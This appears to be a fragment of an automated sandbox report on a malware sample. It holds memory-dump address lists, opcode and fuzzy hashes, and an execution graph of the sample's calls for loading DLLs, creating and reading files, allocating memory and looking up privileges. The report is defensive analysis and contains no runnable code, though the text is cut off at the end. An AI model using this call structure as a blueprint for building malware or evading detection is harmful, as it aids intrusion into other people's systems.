                                  0x009dd966
                                  0x009dd91a
                                  0x009dd91c
                                  0x009dd91e
                                  0x009dd920
                                  0x009dd922
                                  0x009dd924
                                  0x009dd926
                                  0x009dd928
                                  0x009dd92a
                                  0x00000000
                                  0x009dd92a
                                  0x009dd96a
                                  0x009dd96f
                                  0x009dd971
                                  0x009dd974
                                  0x009dd976
                                  0x009dd9ae
                                  0x009dd9ae
                                  0x009dd9af
                                  0x009dd9b4
                                  0x009dd9b6
                                  0x009dd9bf
                                  0x009dd9c2
                                  0x009dd9c4
                                  0x009dd9cb
                                  0x009dd9cc
                                  0x009dd9ce
                                  0x009dd9d0
                                  0x009dd9d2
                                  0x00000000
                                  0x00000000
                                  0x009dd978
                                  0x009dd978
                                  0x009dd97e
                                  0x009dd980
                                  0x009dd982
                                  0x009dd983
                                  0x009dd987
                                  0x009dd988
                                  0x009dd98a
                                  0x009dd98c
                                  0x009dd9d4
                                  0x009dd9d4
                                  0x009dd9d5
                                  0x009dd9d7
                                  0x009dd9d9
                                  0x009dd98e
                                  0x009dd98e
                                  0x009dd992
                                  0x009dd993
                                  0x009dd995
                                  0x009dd996
                                  0x00000000
                                  0x009dd998
                                  0x009dd998
                                  0x009dd99a
                                  0x009dd99c
                                  0x009dd99e
                                  0x009dd9a2
                                  0x009dd9a9
                                  0x009dd9ac
                                  0x00000000
                                  0x009dd9ac
                                  0x009dd996
                                  0x009dd98c
                                  0x009dd9e0
                                  0x009dd9e1
                                  0x009dd9e3
                                  0x009dd9e5
                                  0x009dd9e8
                                  0x009dd9e9
                                  0x009dd9ec
                                  0x009dd9ef
                                  0x009dd9f1
                                  0x009dd9f4
                                  0x009dd9f6
                                  0x009dd9fc
                                  0x009dda03
                                  0x009dda05
                                  0x009dda0a
                                  0x009dda10
                                  0x009dda15
                                  0x009dda17
                                  0x009dda19
                                  0x009dda25
                                  0x009dda2a
                                  0x009dda2f
                                  0x009dda34
                                  0x009dda39
                                  0x009dda3c
                                  0x009dda40
                                  0x009dda4b
                                  0x009dda4c
                                  0x009dda4f
                                  0x009dda53
                                  0x009dda53
                                  0x009dda55
                                  0x009dda57
                                  0x009dda5a
                                  0x009dda5c
                                  0x009dda5e
                                  0x009dda60
                                  0x009dda63
                                  0x009dda65
                                  0x009dda67
                                  0x009dda6d
                                  0x009dda6f
                                  0x009dda71
                                  0x009dda73
                                  0x009dda75
                                  0x009dda77
                                  0x009dda78
                                  0x009dda7d
                                  0x009dda80
                                  0x009dda82
                                  0x009dda83
                                  0x009dda83
                                  0x009dda83
                                  0x009dda88
                                  0x009dda8a
                                  0x009dda8e
                                  0x009dda93
                                  0x009dda94
                                  0x009dda9a
                                  0x009dda9f
                                  0x00000000
                                  0x00000000
                                  0x009ddaa1
                                  0x009ddaa3
                                  0x009ddaa6
                                  0x009ddaa7
                                  0x009ddaa9
                                  0x00000000
                                  0x00000000
                                  0x009ddaab
                                  0x009ddaad
                                  0x009ddab2
                                  0x009ddab5
                                  0x009ddaba
                                  0x009ddabf
                                  0x009ddac0
                                  0x009ddac2
                                  0x009ddac3
                                  0x009ddac4
                                  0x009ddac9
                                  0x009ddacb
                                  0x009ddacb
                                  0x00000000
                                  0x009ddac9
                                  0x009dda7d
                                  0x009dda80
                                  0x009dda82
                                  0x00000000
                                  0x009dda82
                                  0x009ddacc
                                  0x009ddacc
                                  0x009ddacc
                                  0x009ddad0
                                  0x009ddad1
                                  0x009ddad3
                                  0x009ddad3
                                  0x009ddad3
                                  0x009ddad9
                                  0x009ddada
                                  0x009ddadd
                                  0x009ddadf
                                  0x009ddae2
                                  0x009ddae3
                                  0x009ddae6
                                  0x009ddaec
                                  0x009ddaef
                                  0x009ddaf1
                                  0x009ddaf1
                                  0x009ddaf4
                                  0x009ddaf5
                                  0x009ddafd
                                  0x009ddafe
                                  0x009ddb01
                                  0x009ddb03
                                  0x009ddb06
                                  0x009ddb07
                                  0x009ddb0b
                                  0x009ddb0b
                                  0x009ddb0b
                                  0x009ddb0d
                                  0x009ddb10
                                  0x009ddb13
                                  0x009ddb14
                                  0x009ddb16
                                  0x00000000
                                  0x00000000
                                  0x009ddb18
                                  0x009ddb19
                                  0x009ddb1c
                                  0x009ddb21
                                  0x009ddb25
                                  0x009ddb27
                                  0x009ddb27
                                  0x009ddb27
                                  0x00000000
                                  0x009ddb28
                                  0x009ddb2a
                                  0x009ddb2b
                                  0x009ddb2b
                                  0x009ddb33
                                  0x009ddb35
                                  0x009ddb37
                                  0x009ddb37
                                  0x009ddb38
                                  0x009ddb3a
                                  0x009ddb0b
                                  0x009ddb0b
                                  0x009ddb0d
                                  0x009ddb10
                                  0x009ddb10
                                  0x009ddb3c
                                  0x009ddb3d
                                  0x009ddb40
                                  0x009ddb40
                                  0x009ddb45
                                  0x009ddb47
                                  0x009ddb49
                                  0x009ddb4b
                                  0x009ddb4d
                                  0x009ddb4f
                                  0x009ddb53
                                  0x009ddb55
                                  0x009ddb56
                                  0x009ddb56
                                  0x009ddb56
                                  0x009ddb58
                                  0x009ddb5a
                                  0x009ddb6c
                                  0x009ddb6c
                                  0x009ddb6c
                                  0x009ddb72
                                  0x009ddb74
                                  0x00000000
                                  0x00000000
                                  0x009ddb78
                                  0x009ddb7d
                                  0x009ddb7f
                                  0x009ddb82
                                  0x009ddb84
                                  0x009ddb87
                                  0x009ddb89
                                  0x009ddb8b
                                  0x009ddb8c
                                  0x009ddb40
                                  0x009ddb45
                                  0x009ddb47
                                  0x009ddb49
                                  0x009ddb4b
                                  0x009ddb4d
                                  0x009ddb4f
                                  0x009ddb53
                                  0x009ddb55
                                  0x009ddb56
                                  0x009ddb56
                                  0x009ddb56
                                  0x009ddb58
                                  0x009ddb5a
                                  0x009ddb5e
                                  0x009ddb60
                                  0x009ddb62
                                  0x009ddb64
                                  0x009ddb66
                                  0x009ddb68
                                  0x009ddb6a
                                  0x00000000
                                  0x009ddb6a
                                  0x009ddb56
                                  0x009ddb8e
                                  0x009ddb8f
                                  0x009ddb91
                                  0x009ddb92
                                  0x009ddb97
                                  0x009ddb9a
                                  0x009ddb9c
                                  0x009ddba2
                                  0x009ddba4
                                  0x009ddba5
                                  0x00000000
                                  0x009ddb6c
                                  0x009ddb56
                                  0x009ddb40
                                  0x009ddaf1
                                  0x009ddaf4
                                  0x009ddaf5
                                  0x009ddafd
                                  0x009ddafe
                                  0x009ddb01
                                  0x009ddb03
                                  0x009ddb06
                                  0x009ddb07
                                  0x009ddb0a
                                  0x009ddb0b
                                  0x009ddaf1
                                  0x009ddad3
                                  0x00000000
                                  0x009dd92b
                                  0x009dd91a
                                  0x009dd7f4
                                  0x009dd7f6
                                  0x009dd7f7
                                  0x009dd7f8
                                  0x009dd7fb
                                  0x009dd7fc
                                  0x009dd7fd
                                  0x009dd7ff
                                  0x009dd801
                                  0x009dd804
                                  0x009dd804
                                  0x009dd805
                                  0x009dd807
                                  0x009dd807
                                  0x009dd807
                                  0x009dd80f
                                  0x009dd813
                                  0x009dd815
                                  0x009dd817
                                  0x00000000
                                  0x009dd817
                                  0x009dd781
                                  0x009dd605
                                  0x009dd607
                                  0x009dd60d
                                  0x009dd610
                                  0x009dd612
                                  0x009dd613
                                  0x009dd618
                                  0x009dd61a
                                  0x009dd620
                                  0x009dd621
                                  0x009dd628
                                  0x009dd629
                                  0x009dd62a
                                  0x009dd635
                                  0x009dd637
                                  0x009dd639
                                  0x009dd63b
                                  0x00000000
                                  0x009dd63b
                                  0x009dd54f
                                  0x00000000
                                  0x009dd534
                                  0x009dd516
                                  0x00000000
                                  0x009dd4fc
                                  0x009dd4de
                                  0x00000000
                                  0x009dd4c3
                                  0x009dd4a5
                                  0x00000000
                                  0x009dd48b
                                  0x009dd46d
                                  0x00000000
                                  0x009dd453
                                  0x009dd434
                                  0x00000000
                                  0x009dd361
                                  0x009dd361
                                  0x009dd363
                                  0x009dd365
                                  0x009dd367
                                  0x009dd367
                                  0x009dd36d
                                  0x00000000
                                  0x009dd36f
                                  0x009dd36f
                                  0x009dd373
                                  0x009dd374
                                  0x00000000
                                  0x009dd374
                                  0x00000000
                                  0x009dd36d
                                  0x009dd304
                                  0x009dd2e1
                                  0x00000000
                                  0x009dd2a9
                                  0x009dd264
                                  0x009dd258
                                  0x009dd251
                                  0x009dd193
                                  0x009dd17c
                                  0x00000000
                                  0x009dd10f
                                  0x009dd0d4
                                  0x009dd0be
                                  0x009dd0a8

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                  • Associated: 00000000.00000002.478765866.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.479245167.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_950000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c45e1700927183c5b07bd7edf717906c832a0bc8cee8d0bedfff1d424f088454
                                  • Instruction ID: 6a1c365b90c94cb1c94fb270fd1002dbf558824a9e03a612989aa48eab6e6b4a
                                  • Opcode Fuzzy Hash: c45e1700927183c5b07bd7edf717906c832a0bc8cee8d0bedfff1d424f088454
                                  • Instruction Fuzzy Hash: EFA24E7244E3C24FD7138BB49CB56D17FB0AE6721471E49CBC4C08F1A3E229695ADB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                                  • Associated: 00000000.00000002.478765866.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.479245167.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_950000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 73e39fe083ec55a103138185316e56280051cb9f7dcb36cc5a4a94ddee56ce5e
                                  • Instruction ID: 0444373b71c0af493181b7194ef866cf48b9a0ce68d3328043148dd9a104d726
                                  • Opcode Fuzzy Hash: 73e39fe083ec55a103138185316e56280051cb9f7dcb36cc5a4a94ddee56ce5e
                                  • Instruction Fuzzy Hash: 78F1897244E2C29FD7138B7498B26E2BFF4AE6721431D45C7D4C08F263E2296567CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ceead86f727dfc8a9e270fbda549d2b9f9aa3d90cc311d42f7ad8ade0896251d
                                  • Instruction ID: 0849e9300523c79db50eca5841bd4d85db2b5973604e031d6ef37bfc3624d01e
                                  • Opcode Fuzzy Hash: ceead86f727dfc8a9e270fbda549d2b9f9aa3d90cc311d42f7ad8ade0896251d
                                  • Instruction Fuzzy Hash: C8D1D330B056068FCB19CFA8D8C0AAEB7F3EF84314B198469E515EB252DB75EE45CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbb910a7e64d5ec8c4db259763ed8a85642b913b192e51c53ff6f0441e5b763d
                                  • Instruction ID: 4d6815d7a3a63caacf234e543d09b2dde4e6e601cc664422c1bf2ad00a99bef7
                                  • Opcode Fuzzy Hash: dbb910a7e64d5ec8c4db259763ed8a85642b913b192e51c53ff6f0441e5b763d
                                  • Instruction Fuzzy Hash: 93D19B35604256CFCB16CF6AC48089ABBF2FF89300709C5AAE559DF266D731EA45CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3b5c35779508a6f6c3691085cfa3a8b484d0c2237f93404542766a521313cc1
                                  • Instruction ID: cafc734c0e1bc6dc3414b6292217a40d80f986b41dc95c2017b03f48e6e64dd8
                                  • Opcode Fuzzy Hash: a3b5c35779508a6f6c3691085cfa3a8b484d0c2237f93404542766a521313cc1
                                  • Instruction Fuzzy Hash: F0213E267587A60AF316CEBFEC913A73BD36B81354F0CC075AD61CA245DA6DCA008764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Bm$Bm$Bm$Bm
                                  • API String ID: 0-356488072
                                  • Opcode ID: 7acbdb4d8dee948f45f3fb884355619807d03787b6eecfbf8415b683f6a0477a
                                  • Instruction ID: 63fe702841c61e529b1567d7d355135337221fd09077cbc6faf5af6f754f3a97
                                  • Opcode Fuzzy Hash: 7acbdb4d8dee948f45f3fb884355619807d03787b6eecfbf8415b683f6a0477a
                                  • Instruction Fuzzy Hash: E441D030A14289DFC711CF78D4549ADBBF5EF86308B2989EAD445CB2A2DB31DE05CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: KGm$KGm$KGm$KGm
                                  • API String ID: 0-3685086779
                                  • Opcode ID: ed7ed75c389d1da4dbe4bb7966c66f7f6735bae4f66125ee6ad7f3605a7fa676
                                  • Instruction ID: d37db0db86cf0d3b3ca2ece5e915844335062626c0a4af6af19b1cefc9295107
                                  • Opcode Fuzzy Hash: ed7ed75c389d1da4dbe4bb7966c66f7f6735bae4f66125ee6ad7f3605a7fa676
                                  • Instruction Fuzzy Hash: B61182383046118FD310EA7EE894A2A76EABF89688701407CD60BCF3A1DE71ED0587A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:4.5%
                                  Dynamic/Decrypted Code Coverage:2.5%
                                  Signature Coverage:5.2%
                                  Total number of Nodes:630
                                  Total number of Limit Nodes:83
                                  execution_graph 31537 41f250 31540 41b9f0 31537->31540 31541 41ba16 31540->31541 31552 409170 31541->31552 31543 41ba22 31551 41ba69 31543->31551 31560 40d780 31543->31560 31545 41ba37 31548 41ba4c 31545->31548 31608 41a680 31545->31608 31572 40ac20 31548->31572 31549 41ba5b 31550 41a680 2 API calls 31549->31550 31550->31551 31611 4090c0 31552->31611 31554 40917d 31555 409184 31554->31555 31623 409060 31554->31623 31555->31543 31561 40d7ac 31560->31561 32045 40a620 31561->32045 31563 40d7be 32049 40d690 31563->32049 31566 40d7f1 31568 40d802 31566->31568 31571 41a460 2 API calls 31566->31571 31567 40d7d9 31569 40d7e4 31567->31569 31570 41a460 2 API calls 31567->31570 31568->31545 31569->31545 31570->31569 31571->31568 31573 40ac45 31572->31573 31574 40a620 LdrLoadDll 31573->31574 31575 40ac9c 31574->31575 32068 40a2a0 31575->32068 31577 40af13 31577->31549 31578 40acc2 31578->31577 32077 415000 31578->32077 31580 40ad07 31580->31577 32080 407e20 31580->32080 31582 40ad4b 31582->31577 32097 41a4d0 31582->32097 31586 40ada1 31587 40ada8 31586->31587 32109 419fe0 31586->32109 31588 41bf00 2 API calls 31587->31588 31590 40adb5 31588->31590 31590->31549 31592 40adf2 31593 41bf00 2 API calls 31592->31593 31594 40adf9 31593->31594 31594->31549 31595 40ae02 31596 40d810 3 API calls 31595->31596 31597 40ae76 31596->31597 31597->31587 31598 40ae81 31597->31598 31599 41bf00 2 API calls 31598->31599 31600 40aea5 31599->31600 32114 41a030 31600->32114 31603 419fe0 2 API calls 31604 40aee0 31603->31604 31604->31577 32119 419df0 31604->32119 31607 41a680 2 API calls 31607->31577 31609 41a69f ExitProcess 31608->31609 31610 41af80 LdrLoadDll 31608->31610 31610->31609 31642 418ba0 31611->31642 31615 4090e6 31615->31554 31616 4090dc 31616->31615 31649 41b330 31616->31649 31618 409123 31618->31615 31660 408ee0 31618->31660 31620 409143 31666 408930 LdrLoadDll 31620->31666 31622 409155 31622->31554 31624 40907a 31623->31624 31625 41b620 LdrLoadDll 31623->31625 32020 41b620 31624->32020 31625->31624 31628 41b620 LdrLoadDll 31629 4090a1 31628->31629 31630 40d580 31629->31630 31631 40d599 31630->31631 32028 40a4a0 31631->32028 31633 40d5ac 32032 41a1b0 31633->32032 31636 409195 31636->31543 31638 40d5d2 31639 40d5fd 31638->31639 32038 41a230 31638->32038 31641 41a460 2 API calls 31639->31641 31641->31636 31643 418baf 31642->31643 31667 415ab0 31643->31667 31645 4090d3 31646 418a50 31645->31646 31673 41a5d0 31646->31673 31650 41b349 31649->31650 31681 4156b0 31650->31681 31652 41b361 31653 41b36a 31652->31653 31720 41b170 31652->31720 31653->31618 31655 41b37e 31655->31653 31737 419ed0 31655->31737 31663 408efa 31660->31663 31996 407220 31660->31996 31662 408f01 31662->31620 31663->31662 32009 4074e0 31663->32009 31666->31622 31668 415aca 31667->31668 31669 415abe 31667->31669 31668->31645 31669->31668 31672 415f30 LdrLoadDll 31669->31672 31671 415c1c 31671->31645 31672->31671 31674 41a5e6 31673->31674 31677 41af80 31674->31677 31676 418a65 31676->31616 31678 41b005 31677->31678 31679 41af8f 31677->31679 31678->31676 31679->31678 31680 415ab0 LdrLoadDll 31679->31680 31680->31678 31682 4159e5 31681->31682 31683 4156c4 31681->31683 31682->31652 31683->31682 31745 419c20 31683->31745 31686 4157dd 31686->31652 31687 4157f0 31748 41a330 31687->31748 31688 4157d3 31805 41a430 LdrLoadDll 31688->31805 31691 415817 31692 41bf00 2 API calls 31691->31692 31694 415823 31692->31694 31693 4159a9 31696 41a460 2 API calls 31693->31696 31694->31686 31694->31693 31695 4159bf 31694->31695 31700 4158b2 31694->31700 31814 4153f0 LdrLoadDll NtReadFile NtClose 31695->31814 31697 4159b0 31696->31697 31697->31652 31699 4159d2 31699->31652 31701 415919 31700->31701 31703 4158c1 31700->31703 31701->31693 31702 41592c 31701->31702 31807 41a2b0 31702->31807 31705 4158c6 31703->31705 31706 4158da 31703->31706 31806 4152b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31705->31806 31709 4158f7 31706->31709 31710 4158df 31706->31710 31709->31697 31763 415070 31709->31763 31751 415350 31710->31751 31712 4158d0 31712->31652 31714 41598c 31811 41a460 31714->31811 31715 4158ed 31715->31652 31718 41590f 31718->31652 31719 415998 31719->31652 31721 41b18b 31720->31721 31722 41b19d 31721->31722 31832 41be80 31721->31832 31722->31655 31724 41b1bd 31835 414cd0 31724->31835 31726 41b1e0 31726->31722 31727 414cd0 3 API calls 31726->31727 31729 41b202 31727->31729 31729->31722 31867 415ff0 31729->31867 31730 41b28a 31731 41b29a 31730->31731 31962 41af00 LdrLoadDll 31730->31962 31878 41ad70 31731->31878 31734 41b2c8 31957 419e90 31734->31957 31738 41af80 LdrLoadDll 31737->31738 31739 419eec 31738->31739 31990 346967a 31739->31990 31740 419f07 31742 41bf00 31740->31742 31743 41b3d9 31742->31743 31993 41a640 31742->31993 31743->31618 31746 4157a4 31745->31746 31747 41af80 LdrLoadDll 31745->31747 31746->31686 31746->31687 31746->31688 31747->31746 31749 41a34c NtCreateFile 31748->31749 31750 41af80 LdrLoadDll 31748->31750 31749->31691 31750->31749 31752 41536c 31751->31752 31753 41a2b0 LdrLoadDll 31752->31753 31754 41538d 31753->31754 31755 415394 31754->31755 31756 4153a8 31754->31756 31757 41a460 2 API calls 31755->31757 31758 41a460 2 API calls 31756->31758 31759 41539d 31757->31759 31760 4153b1 31758->31760 31759->31715 31815 41c110 LdrLoadDll RtlAllocateHeap 31760->31815 31762 4153bc 31762->31715 31764 4150bb 31763->31764 31766 4150ee 31763->31766 31767 41a2b0 LdrLoadDll 31764->31767 31765 415239 31768 41a2b0 LdrLoadDll 31765->31768 31766->31765 31770 41510a 31766->31770 31769 4150d6 31767->31769 31775 415254 31768->31775 31771 41a460 2 API calls 31769->31771 31772 41a2b0 LdrLoadDll 31770->31772 31773 4150df 31771->31773 31774 415125 31772->31774 31773->31718 31777 415141 31774->31777 31778 41512c 31774->31778 31828 41a2f0 LdrLoadDll 31775->31828 31779 415146 31777->31779 31780 41515c 31777->31780 31782 41a460 2 API calls 31778->31782 31783 41a460 2 API calls 31779->31783 31790 415161 31780->31790 31816 41c0d0 31780->31816 31781 41528e 31784 41a460 2 API calls 31781->31784 31785 415135 31782->31785 31786 41514f 31783->31786 31787 415299 31784->31787 31785->31718 31786->31718 31787->31718 31798 415173 31790->31798 31819 41a3e0 31790->31819 31791 4151c7 31792 4151de 31791->31792 31827 41a270 LdrLoadDll 31791->31827 31794 4151e5 31792->31794 31795 4151fa 31792->31795 31796 41a460 2 API calls 31794->31796 31797 41a460 2 API calls 31795->31797 31796->31798 31799 415203 31797->31799 31798->31718 31800 41522f 31799->31800 31822 41bcd0 31799->31822 31800->31718 31802 41521a 31803 41bf00 2 API calls 31802->31803 31804 415223 31803->31804 31804->31718 31805->31686 31806->31712 31808 41af80 LdrLoadDll 31807->31808 31809 415974 31807->31809 31808->31809 31810 41a2f0 LdrLoadDll 31809->31810 31810->31714 31812 41a47c NtClose 31811->31812 31813 41af80 LdrLoadDll 31811->31813 31812->31719 31813->31812 31814->31699 31815->31762 31818 41c0e8 31816->31818 31829 41a600 31816->31829 31818->31790 31820 41af80 LdrLoadDll 31819->31820 31821 41a3fc NtReadFile 31820->31821 31821->31791 31823 41bcf4 31822->31823 31824 41bcdd 31822->31824 31823->31802 31824->31823 31825 41c0d0 2 API calls 31824->31825 31826 41bd0b 31825->31826 31826->31802 31827->31792 31828->31781 31830 41a61c RtlAllocateHeap 31829->31830 31831 41af80 LdrLoadDll 31829->31831 31830->31818 31831->31830 31833 41bead 31832->31833 31963 41a510 31832->31963 31833->31724 31836 414ce1 31835->31836 31838 414ce9 31835->31838 31836->31726 31837 414fbc 31837->31726 31838->31837 31966 41d0b0 31838->31966 31840 414d3d 31841 41d0b0 2 API calls 31840->31841 31844 414d48 31840->31844 31841->31844 31842 414d96 31845 41d0b0 2 API calls 31842->31845 31844->31842 31846 41d1e0 3 API calls 31844->31846 31977 41d150 LdrLoadDll RtlAllocateHeap RtlFreeHeap 31844->31977 31848 414daa 31845->31848 31846->31844 31847 414e07 31849 41d0b0 2 API calls 31847->31849 31848->31847 31971 41d1e0 31848->31971 31851 414e1d 31849->31851 31852 414e5a 31851->31852 31854 41d1e0 3 API calls 31851->31854 31853 41d0b0 2 API calls 31852->31853 31855 414e65 31853->31855 31854->31851 31856 41d1e0 3 API calls 31855->31856 31863 414e9f 31855->31863 31856->31855 31858 414f94 31979 41d110 LdrLoadDll RtlFreeHeap 31858->31979 31860 414f9e 31980 41d110 LdrLoadDll RtlFreeHeap 31860->31980 31862 414fa8 31981 41d110 LdrLoadDll RtlFreeHeap 31862->31981 31978 41d110 LdrLoadDll RtlFreeHeap 31863->31978 31865 414fb2 31982 41d110 LdrLoadDll RtlFreeHeap 31865->31982 31868 416001 31867->31868 31869 4156b0 8 API calls 31868->31869 31874 416017 31869->31874 31870 416020 31870->31730 31871 416057 31872 41bf00 2 API calls 31871->31872 31873 416068 31872->31873 31873->31730 31874->31870 31874->31871 31875 4160a3 31874->31875 31876 41bf00 2 API calls 31875->31876 31877 4160a8 31876->31877 31877->31730 31983 41ac00 31878->31983 31880 41ad84 31881 41ac00 LdrLoadDll 31880->31881 31882 41ad8d 31881->31882 31883 41ac00 LdrLoadDll 31882->31883 31884 41ad96 31883->31884 31885 41ac00 LdrLoadDll 31884->31885 31886 41ad9f 31885->31886 31887 41ac00 LdrLoadDll 31886->31887 31888 41ada8 31887->31888 31889 41ac00 LdrLoadDll 31888->31889 31890 41adb1 31889->31890 31891 41ac00 LdrLoadDll 31890->31891 31892 41adbd 31891->31892 31893 41ac00 LdrLoadDll 31892->31893 31894 41adc6 31893->31894 31895 41ac00 LdrLoadDll 31894->31895 31896 41adcf 31895->31896 31897 41ac00 LdrLoadDll 31896->31897 31898 41add8 31897->31898 31899 41ac00 LdrLoadDll 31898->31899 31900 41ade1 31899->31900 31901 41ac00 LdrLoadDll 31900->31901 31902 41adea 31901->31902 31903 41ac00 LdrLoadDll 31902->31903 31904 41adf6 31903->31904 31905 41ac00 LdrLoadDll 31904->31905 31906 41adff 31905->31906 31907 41ac00 LdrLoadDll 31906->31907 31908 41ae08 31907->31908 31909 41ac00 LdrLoadDll 31908->31909 31910 41ae11 31909->31910 31911 41ac00 LdrLoadDll 31910->31911 31912 41ae1a 31911->31912 31913 41ac00 LdrLoadDll 31912->31913 31914 41ae23 31913->31914 31915 41ac00 LdrLoadDll 31914->31915 31916 41ae2f 31915->31916 31917 41ac00 LdrLoadDll 31916->31917 31918 41ae38 31917->31918 31919 41ac00 LdrLoadDll 31918->31919 31920 41ae41 31919->31920 31921 41ac00 LdrLoadDll 31920->31921 31922 41ae4a 31921->31922 31923 41ac00 LdrLoadDll 31922->31923 31924 41ae53 31923->31924 31925 41ac00 LdrLoadDll 31924->31925 31926 41ae5c 31925->31926 31927 41ac00 LdrLoadDll 31926->31927 31928 41ae68 31927->31928 31929 41ac00 LdrLoadDll 31928->31929 31930 41ae71 31929->31930 31931 41ac00 LdrLoadDll 31930->31931 31932 41ae7a 31931->31932 31933 41ac00 LdrLoadDll 31932->31933 31934 41ae83 31933->31934 31935 41ac00 LdrLoadDll 31934->31935 31936 41ae8c 31935->31936 31937 41ac00 LdrLoadDll 31936->31937 31938 41ae95 31937->31938 31939 41ac00 LdrLoadDll 31938->31939 31940 41aea1 31939->31940 31941 41ac00 LdrLoadDll 31940->31941 31942 41aeaa 31941->31942 31943 41ac00 LdrLoadDll 31942->31943 31944 41aeb3 31943->31944 31945 41ac00 LdrLoadDll 31944->31945 31946 41aebc 31945->31946 31947 41ac00 LdrLoadDll 31946->31947 31948 41aec5 31947->31948 31949 41ac00 LdrLoadDll 31948->31949 31950 41aece 31949->31950 31951 41ac00 LdrLoadDll 31950->31951 31952 41aeda 31951->31952 31953 41ac00 LdrLoadDll 31952->31953 31954 41aee3 31953->31954 31955 41ac00 LdrLoadDll 31954->31955 31956 41aeec 31955->31956 31956->31734 31958 41af80 LdrLoadDll 31957->31958 31959 419eac 31958->31959 31989 3469860 LdrInitializeThunk 31959->31989 31960 419ec3 31960->31655 31962->31731 31964 41a52c NtAllocateVirtualMemory 31963->31964 31965 41af80 LdrLoadDll 31963->31965 31964->31833 31965->31964 31967 41d0c0 31966->31967 31968 41d0c6 31966->31968 31967->31840 31969 41c0d0 2 API calls 31968->31969 31970 41d0ec 31969->31970 31970->31840 31972 41d150 31971->31972 31973 41d1ad 31972->31973 31974 41d18a 31972->31974 31975 41c0d0 2 API calls 31972->31975 31973->31848 31976 41bf00 2 API calls 31974->31976 31975->31974 31976->31973 31977->31844 31978->31858 31979->31860 31980->31862 31981->31865 31982->31837 31984 41ac1b 31983->31984 31985 415ab0 LdrLoadDll 31984->31985 31986 41ac3b 31985->31986 31987 415ab0 LdrLoadDll 31986->31987 31988 41acef 31986->31988 31987->31988 31988->31880 31988->31988 31989->31960 31991 3469681 31990->31991 31992 346968f LdrInitializeThunk 31990->31992 31991->31740 31992->31740 31994 41af80 LdrLoadDll 31993->31994 31995 41a65c RtlFreeHeap 31994->31995 31995->31743 31997 407230 31996->31997 31998 40722b 31996->31998 31999 41be80 2 API calls 31997->31999 31998->31663 32006 407255 31999->32006 32000 4072b8 32000->31663 32001 419e90 2 API calls 32001->32006 32002 4072be 32004 4072e4 32002->32004 32005 41a590 2 API calls 32002->32005 32004->31663 32007 4072d5 32005->32007 32006->32000 32006->32001 32006->32002 32008 41be80 2 API calls 32006->32008 32012 41a590 32006->32012 32007->31663 32008->32006 32010 41a590 2 API calls 32009->32010 32011 4074fe 32010->32011 32011->31620 32013 41a5ac 32012->32013 32014 41af80 LdrLoadDll 32012->32014 32019 34696e0 LdrInitializeThunk 32013->32019 32014->32013 32015 41a5c3 32015->32006 32016 41af80 LdrLoadDll 32015->32016 32017 41a5ec 32016->32017 32017->32006 32019->32015 32021 41b643 32020->32021 32024 40a150 32021->32024 32025 40a174 32024->32025 32026 40a1b0 LdrLoadDll 32025->32026 32027 40908b 32025->32027 32026->32027 32027->31628 32029 40a4c3 32028->32029 32031 40a540 32029->32031 32043 419c60 LdrLoadDll 32029->32043 32031->31633 32033 41af80 LdrLoadDll 32032->32033 32034 40d5bb 32033->32034 32034->31636 32035 41a7a0 32034->32035 32036 41a7bf LookupPrivilegeValueW 32035->32036 32037 41af80 LdrLoadDll 32035->32037 32036->31638 32037->32036 32039 41a24c 32038->32039 32040 